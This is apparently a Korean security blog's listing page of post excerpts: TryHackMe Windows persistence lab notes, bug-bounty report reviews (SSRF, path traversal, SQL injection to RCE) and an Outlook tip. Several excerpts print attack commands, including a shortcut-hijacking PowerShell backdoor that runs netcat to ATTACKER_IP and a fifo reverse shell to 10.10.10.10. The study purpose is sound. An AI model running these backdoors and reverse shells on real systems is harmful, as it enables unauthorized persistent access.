THM - Windows Local Persistence (2)
·
System/침투
Persistence : 침투 후 지속적으로 타겟에 접근할 수 있도록 하는 기술* 참고 : MITRE ATT&CK TASK 33.1 Executable Files바탕화면에 calc.exe 바로가기가 있다고 가정 1) PS 스크립트 만들기# C:\Windows\System32\backdoor.ps1Start-Process -NoNewWindow "c:\tools\nc64.exe" "-e cmd.exe {ATTACKER_IP} 4444"C:\Windows\System32\calc.exe 2) 바탕화면에 있는 calc.exe 바로가기의 Target 변경# target# PowerShell 스크립트가 숨겨진 창에서 실행powershell.exe -WindowStyle hidden C:\Windows\System..
THM - Windows Local Persistence (1)
·
System/침투
Persistence : 침투 후 지속적으로 타겟에 접근할 수 있도록 하는 기술* 참고 : MITRE ATT&CK  TASK 2. 타 계정의 권한 조작 지속성을 얻는 가장 쉬운 방법은 "관리자의 크리덴셜을 얻는 것" 이다. 다만, 블루팀 측에서 탐지하기 어렵게 하기 위해, 타 계정을 조작하여 관리자의 권한을 부여하는 방법을 사용할 것이다. ※ 가정 : 타겟 컴퓨터의 패스워드 해시를 덤프, 계정의 비밀번호를 성공적으로 크랙함 (Administrator)※ kali에서 타겟으로 접속할 때 evil-winrm 툴을 사용한다.evil-winrm -i {TARGET IP} -u user1 -p Password1234 2.1 Assign Group Memberships2.1.1 administrators # cmd..
버그바운티 보고서 - SSRF Dropbox
·
보안/리뷰
보고서 링크(HERE) SSRF Dropbox 타겟 : Dropbox, 문서를 가져오는 기능 * Dropbox, Google Drive, OneDrive, EverNote 등에서 문서를 가져올 수 있는 기능 * 해당 포인트에서 SSRF 취약점을 발견함 1.1 공격자의 서버에 접근하여 문서를 가져갈 수 있는지 확인 file_reference 매개변수를 변경했더니 404 확인 1.2 service_type과 file_reference가 맞아야 하는 것을 깨달음 service_type=O 면 file_reference는 OneDrive 주소가 와야함. GET /attachment/externalFile?service_type=O&file_reference=MYONEDRIVEFILELINKHERE&file_na..
버그바운티 보고서 - Path Traversal to RCE
·
보안/리뷰
보고서 링크 (HERE) [취약점 재연 방법] 문제가 되는 소스 : maven_packages.rb 버전 : GitLab 12.5.3(grape 1.1) * GitLab은 루비온레일즈를 통해 만들었고, 루비온레일즈는 기본적으로 RESTAPI 기능을 grape 프레임워크를 사용하여 처리함. * 해당 버전은 기본적으로 들어온 URL에 대해서 URL decoding을 하지 않음 [순서] 1) GitLab 인스턴스를 빌드하기 전에 package 기능 활성화 2) Project 생성 3) API 호출을 위한 private token 생성 4) 공격 페이로드 전송 5) ssh 접속 [공격 페이로드 전송] # 공격 페이로드 curl -H "Private-Token: $(cat token)" http://127.0.0..
버그바운티 보고서 - Time-Based SQL Injection to RCE
·
보안/리뷰
보고서 링크(Here) SQL Injection to RCE HackerOne Blind User-Agent SQL Injection to Blind Remote OS Command Execsution at `~~.com` 1.1 사용자 입력값을 받는지 확인 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36'-- 1.2 Time-based SQL Injection User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) C..
버그헌팅 TIP
·
보안/리뷰
보호되어 있는 글입니다.
reverse shell - fifo
·
System/침투
rm /tmp/fifo;mkfifo /tmp/fifo;cat /tmp/fifo | /bin/sh -i 2>&1 | nc 10.10.10.10 4443 >/tmp/fifo fifo : 서로 다른 프로세스 간 통신에 사용되는 파이프 * 본래 pipe는 부모-자식 간에만 이용 가능 - fifo 파일이 이미 존재하는 경우 에러가 발생하기에 삭제 - fifo 파일 생성 - cat tmp/fifo : fifo 파일 읽어와서 표준출력 - 읽은 데이터를 /bin/sh 로 전달하여 실행 * -i : 대화형 쉘 - nc 10.10.10.10 4443 > /tmp/fifo : nc연결시도ㅡ, 그 출력을 fifo로 대충 이런 의미인 듯 하다. 참고로 msfvemon 명령으로도 위 명령생성 가능함 msfvenom -p cmd/..
아웃룩 메일 하이퍼링크 기본앱 설정
·
일상X사랑X돈/뜨거운감자
이상하게 아웃룩으로 온 메일에 첨부된 하이퍼링크를 누르면 edge로 열린다. 나는 chrome을 사용하고 있는데 -,- 기본 앱 설정이 Chrome으로 되어있음에도 불구하고 Edge로 열러서 귀찮았다. 업무메일 확인해야하는데 Edge로 열리면 새로 로그인하라고 하니.. 보니까 아웃룩 설정에 별도로 설정이 있어 이러는 것 같다. [설정 위치] 파일 > 옵션 > 고급 > 파일 및 브라우저 기본 설정 > "기본 브라우저" 선택 [그림 설명] 끝.